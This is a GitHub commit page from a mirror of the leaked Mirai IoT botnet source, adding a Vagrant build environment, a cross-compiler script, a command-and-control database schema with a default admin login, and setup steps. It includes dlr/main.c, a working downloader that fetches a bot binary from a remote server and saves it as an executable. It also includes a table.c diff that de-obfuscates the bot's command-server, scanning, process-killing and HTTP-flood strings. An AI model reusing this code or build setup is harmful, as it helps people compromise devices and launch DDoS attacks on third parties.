mirrors/Mirai-Source-Code
1
0
Fork 0
mirror of https://github.com/jgamblin/Mirai-Source-Code synced 2024-06-14 01:06:50 +00:00
Code Issues Releases Wiki Activity

Merge c8381aa219 into 22e18df02e

Browse Source
This commit is contained in:
chuckixia 2016-10-12 18:38:43 +00:00 committed by GitHub
commit 5a83eec32b
23 changed files with 613 additions and 68 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
Configuring_CNC_Database.txt Normal file
View File

@ -0,0 +1,41 @@
DROP DATABASE IF EXISTS mirai;
CREATE DATABASE mirai;
USE mirai;
CREATE TABLE `history` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`user_id` int(10) unsigned NOT NULL,
`time_sent` int(10) unsigned NOT NULL,
`duration` int(10) unsigned NOT NULL,
`command` text NOT NULL,
`max_bots` int(11) DEFAULT '-1',
PRIMARY KEY (`id`),
KEY `user_id` (`user_id`)
);
CREATE TABLE `users` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`username` varchar(32) NOT NULL,
`password` varchar(32) NOT NULL,
`duration_limit` int(10) unsigned DEFAULT NULL,
`cooldown` int(10) unsigned NOT NULL,
`wrc` int(10) unsigned DEFAULT NULL,
`last_paid` int(10) unsigned NOT NULL,
`max_bots` int(11) DEFAULT '-1',
`admin` int(10) unsigned DEFAULT '0',
`intvl` int(10) unsigned DEFAULT '30',
`api_key` text,
PRIMARY KEY (`id`),
KEY `username` (`username`)
);
CREATE TABLE `whitelist` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`prefix` varchar(16) DEFAULT NULL,
`netmask` tinyint(3) unsigned DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `prefix` (`prefix`)
);
INSERT INTO users (username, password, duration_limit, cooldown, wrc, last_paid, max_bots, admin, api_key)\
VALUES ( 'user', 'password',100, 0, 0, 0, 100, 1, 'foobar');

42
README.md Executable file → Normal file
View File

@ -1,3 +1,45 @@
# Mirai Botnet Client, Echo Loader and CNC source code
This is the source code released from [here](http://hackforums.net/showthread.php?tid=5420472) as discussed in this [Brian Krebs Post](https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/).
I found
mirai.src.zip from [VT](https://www.virustotal.com/en/file/68d01cd712da9c5f889ce774ae7ad41cd6fbc13c42864aa593b60c1f6a7cef63/analysis/)
loader.src.zip from [VT](https://www.virustotal.com/en/file/fffad2fbd1fa187a748f6d2009b942d4935878d2c062895cde53e71d125b735e/analysis/)
dlr.src.zip from [VT](https://www.virustotal.com/en/file/519d4e3f9bc80893838f94fd0365d587469f9468b4fa2ff0fb0c8f7e8fb99429/analysis/)
Maybe they are original files.
Configuring_CNC_Database.txt from [pastebin.com/86d0iL9g](http://pastebin.com/86d0iL9g)
Setting_Up_Cross_Compilers.sh from [pastebin.com/1rRCc3aD](http://pastebin.com/1rRCc3aD)
Felicitychou
Chuck:
Merged Felicitychou's additions and setup Vagrant file.
To setup build environment, you just need to "vagrant up"
Also removed obfuscation of table.c, so no need to run "enc" tool anymore
Have modified some shell scripts to install more cross compiler packages and remove errors
modified build.sh to download go packages
steps to setup build environment
- git pull
- vagrant up
- vagrant ssh
- cd /vagrant/mirai
- ./build.sh
Steps to create database:
`cat Configure_CNC_Database.txt | mysql -u root --password=password`
Start the CnC
- make a prompt file in ./release
- `cd ./release`
- `sudo ./cnc`

68
Setting_Up_Cross_Compilers.sh Executable file
View File

@ -0,0 +1,68 @@
#!/bin/bash
# RUN ALL OF THESE AS A PRIVELEGED USER, SINCE WE ARE DOWNLOADING INTO /etc
apt-get install -y gcc golang electric-fence
if [ ! -d "/etc/xcompile" ]; then
pushd .
mkdir /etc/xcompile
cd /etc/xcompile
echo "downloading cross compilers"
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
echo "unpacking cross compilers"
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
echo "deleting cross compilers"
rm *.tar.bz2
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
popd
fi
# PUT THESE COMMANDS IN THE FILE ~/.bashrc
# Cross compiler toolchains
echo 'adding compiler toolchains to $PATH'
echo '
export PATH=$PATH:/etc/xcompile/armv4l/bin
export PATH=$PATH:/etc/xcompile/armv5l/bin
export PATH=$PATH:/etc/xcompile/i586/bin
export PATH=$PATH:/etc/xcompile/m68k/bin
export PATH=$PATH:/etc/xcompile/mips/bin
export PATH=$PATH:/etc/xcompile/mipsel/bin
export PATH=$PATH:/etc/xcompile/powerpc/bin
export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
export PATH=$PATH:/etc/xcompile/sh4/bin
export PATH=$PATH:/etc/xcompile/sparc/bin
# Golang
export PATH=$PATH:/usr/local/go/bin
export GOPATH=$HOME/Documents/go
' >> /etc/bash.bashrc

26
Vagrantfile vendored Normal file
View File

@ -0,0 +1,26 @@
# -*- mode: ruby -*-
# vi: set ft=ruby :
# This vagrant sets up build environment for mirai botnet
Vagrant.configure("2") do |config|
# The most common configuration options are documented and commented below.
# For a complete reference, please see the online documentation at
# https://docs.vagrantup.com.
# Every Vagrant development environment requires a box. You can search for
# boxes at https://atlas.hashicorp.com/search.
config.vm.box = "ubuntu/trusty64"
# Enable provisioning with a shell script. Additional provisioners such as
# Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
# documentation for more information about their specific syntax and use.
config.vm.provision "shell", inline: <<-SHELL
debconf-set-selections <<< 'mysql-server mysql-server/root_password password password'
debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password password'
apt-get update
apt-get upgrade -y
apt-get install -y mysql-server mysql-client golang gcc electric-fence git
chmod +x /vagrant/Setting_Up_Cross_Compilers.sh
/vagrant/Setting_Up_Cross_Compilers.sh
SHELL
end

BIN
dlr.src.zip Normal file
View File

Binary file not shown.

22
dlr/build.sh Normal file
View File

@ -0,0 +1,22 @@
armv4l-gcc -Os -D BOT_ARCH=\"arm\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.arm
armv6l-gcc -Os -D BOT_ARCH=\"arm7\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.arm7
i686-gcc -Os -D BOT_ARCH=\"x86\" -D X32 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.x86
m68k-gcc -Os -D BOT_ARCH=\"m68k\" -D M68K -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.m68k
mips-gcc -Os -D BOT_ARCH=\"mips\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mips
#mips64-gcc -Os -D BOT_ARCH=\"mps64\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mps64
mipsel-gcc -Os -D BOT_ARCH=\"mpsl\" -D MIPSEL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mpsl
powerpc-gcc -Os -D BOT_ARCH=\"ppc\" -D PPC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.ppc
sh4-gcc -Os -D BOT_ARCH=\"sh4\" -D SH4 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh4
#sh2elf-gcc -Os -D BOT_ARCH=\"sh2el\" -D SH2EL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh2el
#sh2eb-gcc -Os -D BOT_ARCH=\"sh2eb\" -D SH2EB -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh2eb
sparc-gcc -Os -D BOT_ARCH=\"spc\" -D SPARC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.spc
armv4l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.arm
armv6l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.arm7
i686-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.x86
m68k-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.m68k
mips-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.mips
mipsel-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.mpsl
powerpc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.ppc
sh4-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.sh4
sparc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.spc

274
dlr/main.c Normal file
View File

@ -0,0 +1,274 @@
#include <sys/types.h>
//#include <bits/syscalls.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define HTTP_SERVER utils_inet_addr(127,0,0,1) // CHANGE TO YOUR HTTP SERVER IP
#define EXEC_MSG "MIRAI\n"
#define EXEC_MSG_LEN 6
#define DOWNLOAD_MSG "FIN\n"
#define DOWNLOAD_MSG_LEN 4
#define STDIN 0
#define STDOUT 1
#define STDERR 2
#if BYTE_ORDER == BIG_ENDIAN
#define HTONS(n) (n)
#define HTONL(n) (n)
#elif BYTE_ORDER == LITTLE_ENDIAN
#define HTONS(n) (((((unsigned short)(n) & 0xff)) << 8) | (((unsigned short)(n) & 0xff00) >> 8))
#define HTONL(n) (((((unsigned long)(n) & 0xff)) << 24) | \
((((unsigned long)(n) & 0xff00)) << 8) | \
((((unsigned long)(n) & 0xff0000)) >> 8) | \
((((unsigned long)(n) & 0xff000000)) >> 24))
#else
#error "Fix byteorder"
#endif
#ifdef __ARM_EABI__
#define SCN(n) ((n) & 0xfffff)
#else
#define SCN(n) (n)
#endif
inline void run(void);
int sstrlen(char *);
unsigned int utils_inet_addr(unsigned char, unsigned char, unsigned char, unsigned char);
/* stdlib calls */
int xsocket(int, int, int);
int xwrite(int, void *, int);
int xread(int, void *, int);
int xconnect(int, struct sockaddr_in *, int);
int xopen(char *, int, int);
int xclose(int);
void x__exit(int);
#define socket xsocket
#define write xwrite
#define read xread
#define connect xconnect
#define open xopen
#define close xclose
#define __exit x__exit
#ifdef DEBUG
/*
void xprintf(char *str)
{
write(1, str, sstrlen(str));
}
#define printf xprintf
*/
#endif
void __start(void)
{
#if defined(MIPS) || defined(MIPSEL)
__asm(
".set noreorder\n"
"move $0, $31\n"
"bal 10f\n"
"nop\n"
"10:\n.cpload $31\n"
"move $31, $0\n"
".set reorder\n"
);
#endif
run();
}
inline void run(void)
{
char recvbuf[128];
struct sockaddr_in addr;
int sfd, ffd, ret;
unsigned int header_parser = 0;
int arch_strlen = sstrlen(BOT_ARCH);
write(STDOUT, EXEC_MSG, EXEC_MSG_LEN);
addr.sin_family = AF_INET;
addr.sin_port = HTONS(80);
addr.sin_addr.s_addr = HTTP_SERVER;
ffd = open("dvrHelper", O_WRONLY | O_CREAT | O_TRUNC, 0777);
sfd = socket(AF_INET, SOCK_STREAM, 0);
#ifdef DEBUG
if (ffd == -1)
printf("Failed to open file!\n");
if (sfd == -1)
printf("Failed to call socket()\n");
#endif
if (sfd == -1 || ffd == -1)
__exit(1);
#ifdef DEBUG
printf("Connecting to host...\n");
#endif
if ((ret = connect(sfd, &addr, sizeof (struct sockaddr_in))) < 0)
{
#ifdef DEBUG
printf("Failed to connect to host.\n");
#endif
write(STDOUT, "NIF\n", 4);
__exit(-ret);
}
#ifdef DEBUG
printf("Connected to host\n");
#endif
if (write(sfd, "GET /bins/mirai." BOT_ARCH " HTTP/1.0\r\n\r\n", 16 + arch_strlen + 13) != (16 + arch_strlen + 13))
{
#ifdef DEBUG
printf("Failed to send get request.\n");
#endif
__exit(3);
}
#ifdef DEBUG
printf("Started header parse...\n");
#endif
while (header_parser != 0x0d0a0d0a)
{
char ch;
int ret = read(sfd, &ch, 1);
if (ret != 1)
__exit(4);
header_parser = (header_parser << 8) | ch;
}
#ifdef DEBUG
printf("Finished receiving HTTP header\n");
#endif
while (1)
{
int ret = read(sfd, recvbuf, sizeof (recvbuf));
if (ret <= 0)
break;
write(ffd, recvbuf, ret);
}
close(sfd);
close(ffd);
write(STDOUT, DOWNLOAD_MSG, DOWNLOAD_MSG_LEN);
__exit(5);
}
int sstrlen(char *str)
{
int c = 0;
while (*str++ != 0)
c++;
return c;
}
unsigned int utils_inet_addr(unsigned char one, unsigned char two, unsigned char three, unsigned char four)
{
unsigned long ip = 0;
ip |= (one << 24);
ip |= (two << 16);
ip |= (three << 8);
ip |= (four << 0);
return HTONL(ip);
}
int xsocket(int domain, int type, int protocol)
{
#if defined(__NR_socketcall)
#ifdef DEBUG
printf("socket using socketcall\n");
#endif
struct {
int domain, type, protocol;
} socketcall;
socketcall.domain = domain;
socketcall.type = type;
socketcall.protocol = protocol;
// 1 == SYS_SOCKET
int ret = syscall(SCN(SYS_socketcall), 1, &socketcall);
#ifdef DEBUG
printf("socket got ret: %d\n", ret);
#endif
return ret;
#else
#ifdef DEBUG
printf("socket using socket\n");
#endif
return syscall(SCN(SYS_socket), domain, type, protocol);
#endif
}
int xread(int fd, void *buf, int len)
{
return syscall(SCN(SYS_read), fd, buf, len);
}
int xwrite(int fd, void *buf, int len)
{
return syscall(SCN(SYS_write), fd, buf, len);
}
int xconnect(int fd, struct sockaddr_in *addr, int len)
{
#if defined(__NR_socketcall)
#ifdef DEBUG
printf("connect using socketcall\n");
#endif
struct {
int fd;
struct sockaddr_in *addr;
int len;
} socketcall;
socketcall.fd = fd;
socketcall.addr = addr;
socketcall.len = len;
// 3 == SYS_CONNECT
int ret = syscall(SCN(SYS_socketcall), 3, &socketcall);
#ifdef DEBUG
printf("connect got ret: %d\n", ret);
#endif
return ret;
#else
#ifdef DEBUG
printf("connect using connect\n");
#endif
return syscall(SCN(SYS_connect), fd, addr, len);
#endif
}
int xopen(char *path, int flags, int other)
{
return syscall(SCN(SYS_open), path, flags, other);
}
int xclose(int fd)
{
return syscall(SCN(SYS_close), fd);
}
void x__exit(int code)
{
syscall(SCN(SYS_exit), code);
}

10
dlr/release/.build Normal file
View File

@ -0,0 +1,10 @@
<proxseas> wtf why would you hit krebs
<tpres> Hm, why do you care? Just move C2 or something?
<proxseas> no fuck, this is the shit you avoid. fuck off
<proxseas> im kicking you off
<tpres> Are you fucking me? you better be joking
<proxseas> DO YOU HVE ANY IDEE
<proxseas> * IDEA
<proxseas> WHAT YOUVE DONE
<tpres> look man i was just messing around its nbd
<proxseas> YOU F UCKING IDIOT

BIN
dlr/release/dlr.arm Normal file
View File

Binary file not shown.

BIN
dlr/release/dlr.arm7 Normal file
View File

Binary file not shown.

BIN
dlr/release/dlr.m68k Normal file
View File

Binary file not shown.

BIN
dlr/release/dlr.mips Normal file
View File

Binary file not shown.

BIN
dlr/release/dlr.mpsl Normal file
View File

Binary file not shown.

BIN
dlr/release/dlr.ppc Normal file
View File

Binary file not shown.

BIN
dlr/release/dlr.sh4 Normal file
View File

Binary file not shown.

BIN
dlr/release/dlr.spc Normal file
View File

Binary file not shown.

BIN
loader.src.zip Normal file
View File

Binary file not shown.

BIN
mirai.src.zip Normal file
View File

Binary file not shown.

120
mirai/bot/table.c
View File

@ -15,64 +15,64 @@ struct table_value table[TABLE_MAX_KEYS];
void table_init(void)
{
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
add_entry(TABLE_CNC_PORT, "\x22\x35", 2); // 23
// removeed obfuscation
// use the folowing bash magic to create domain or other things for this hexadecimal escaped nonesense
//
// $echo example.com | hexdump -e '1/1 "\\\x"' -e '1/1 "%.2x"'
// \x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x0a
// remember to add null byte on end
add_entry(TABLE_SCAN_CB_DOMAIN, "\x50\x47\x52\x4D\x50\x56\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 29); // report.changeme.com
add_entry(TABLE_SCAN_CB_PORT, "\x99\xC7", 2); // 48101
add_entry(TABLE_CNC_DOMAIN, "\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x00", 12); //changed to example.com
add_entry(TABLE_CNC_PORT, "\x00\x17", 2);
add_entry(TABLE_SCAN_CB_DOMAIN, "\x72\x65\x70\x6f\x72\x74\x2e\x63\x68\x61\x6e\x67\x65\x6d\x65\x2e\x63\x6f\x6d\x00", 20);
add_entry(TABLE_SCAN_CB_PORT, "\xbb\xe5", 2);
add_entry(TABLE_EXEC_SUCCESS, "\x6c\x69\x73\x74\x65\x6e\x69\x6e\x67\x20\x74\x75\x6e\x30\x00", 15);
add_entry(TABLE_KILLER_SAFE, "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x79\x6f\x75\x74\x75\x2e\x62\x65\x2f\x64\x51\x77\x34\x77\x39\x57\x67\x58\x63\x51\x00", 29);
add_entry(TABLE_KILLER_PROC, "\x2f\x70\x72\x6f\x63\x2f\x00", 7);
add_entry(TABLE_KILLER_EXE, "\x2f\x65\x78\x65\x00", 5);
add_entry(TABLE_KILLER_DELETED, "\x20\x28\x64\x65\x6c\x65\x74\x65\x64\x29\x00", 11);
add_entry(TABLE_KILLER_FD, "\x2f\x66\x64\x00", 4);
add_entry(TABLE_KILLER_ANIME, "\x2e\x61\x6e\x69\x6d\x65\x00", 7);
add_entry(TABLE_KILLER_STATUS, "\x2f\x73\x74\x61\x74\x75\x73\x00", 8);
add_entry(TABLE_MEM_QBOT, "\x52\x45\x50\x4f\x52\x54\x20\x25\x73\x3a\x25\x73\x00", 13);
add_entry(TABLE_MEM_QBOT2, "\x48\x54\x54\x50\x46\x4c\x4f\x4f\x44\x00", 10);
add_entry(TABLE_MEM_QBOT3, "\x4c\x4f\x4c\x4e\x4f\x47\x54\x46\x4f\x00", 10);
add_entry(TABLE_MEM_UPX, "\x5c\x78\x35\x38\x5c\x78\x34\x44\x5c\x78\x34\x45\x5c\x78\x34\x45\x5c\x78\x34\x33\x5c\x78\x35\x30\x5c\x78\x34\x36\x5c\x78\x32\x32\x00", 33);
add_entry(TABLE_MEM_ZOLLARD, "\x7a\x6f\x6c\x6c\x61\x72\x64\x00", 8);
add_entry(TABLE_MEM_REMAITEN, "\x47\x45\x54\x4c\x4f\x43\x41\x4c\x49\x50\x00", 11);
add_entry(TABLE_SCAN_SHELL, "\x73\x68\x65\x6c\x6c\x00", 6);
add_entry(TABLE_SCAN_ENABLE, "\x65\x6e\x61\x62\x6c\x65\x00", 7);
add_entry(TABLE_SCAN_SYSTEM, "\x73\x79\x73\x74\x65\x6d\x00", 7);
add_entry(TABLE_SCAN_SH, "\x73\x68\x00", 3);
add_entry(TABLE_SCAN_QUERY, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x4d\x49\x52\x41\x49\x00", 19);
add_entry(TABLE_SCAN_RESP, "\x4d\x49\x52\x41\x49\x3a\x20\x61\x70\x70\x6c\x65\x74\x20\x6e\x6f\x74\x20\x66\x6f\x75\x6e\x64\x00", 24);
add_entry(TABLE_SCAN_NCORRECT, "\x6e\x63\x6f\x72\x72\x65\x63\x74\x00", 9);
add_entry(TABLE_SCAN_PS, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x70\x73\x00", 16);
add_entry(TABLE_SCAN_KILL_9, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x00", 22);
add_entry(TABLE_ATK_VSE, "\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x79\x00", 21);
add_entry(TABLE_ATK_RESOLVER, "\x2f\x65\x74\x63\x2f\x72\x65\x73\x6f\x6c\x76\x2e\x63\x6f\x6e\x66\x00", 17);
add_entry(TABLE_ATK_NSERV, "\x6e\x61\x6d\x65\x73\x65\x72\x76\x65\x72\x20\x00", 12);
add_entry(TABLE_ATK_KEEP_ALIVE, "\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x00", 23);
add_entry(TABLE_ATK_ACCEPT, "\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x69\x6d\x61\x67\x65\x2f\x77\x65\x62\x70\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x00", 83);
add_entry(TABLE_ATK_ACCEPT_LNG, "\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x38\x00", 32);
add_entry(TABLE_ATK_CONTENT_TYPE, "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x00", 48);
add_entry(TABLE_ATK_SET_COOKIE, "\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65\x28\x27\x00", 12);
add_entry(TABLE_ATK_REFRESH_HDR, "\x72\x65\x66\x72\x65\x73\x68\x3a\x00", 9);
add_entry(TABLE_ATK_LOCATION_HDR, "\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x00", 10);
add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x73\x65\x74\x2d\x63\x6f\x6f\x6b\x69\x65\x3a\x00", 12);
add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x00", 16);
add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x74\x72\x61\x6e\x73\x66\x65\x72\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x00", 19);
add_entry(TABLE_ATK_CHUNKED, "\x63\x68\x75\x6e\x6b\x65\x64\x00", 8);
add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x00", 11);
add_entry(TABLE_ATK_CONNECTION_HDR, "\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x00", 12);
add_entry(TABLE_ATK_DOSARREST, "\x73\x65\x72\x76\x65\x72\x3a\x20\x64\x6f\x73\x61\x72\x72\x65\x73\x74\x00", 18);
add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x73\x65\x72\x76\x65\x72\x3a\x20\x63\x6c\x6f\x75\x64\x66\x6c\x61\x72\x65\x2d\x6e\x67\x69\x6e\x78\x00", 25);
add_entry(TABLE_HTTP_ONE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x31\x2e\x30\x2e\x32\x37\x30\x34\x2e\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 111);
add_entry(TABLE_HTTP_TWO, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x32\x2e\x30\x2e\x32\x37\x34\x33\x2e\x31\x31\x36\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 111);
add_entry(TABLE_HTTP_THREE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x31\x2e\x30\x2e\x32\x37\x30\x34\x2e\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 110);
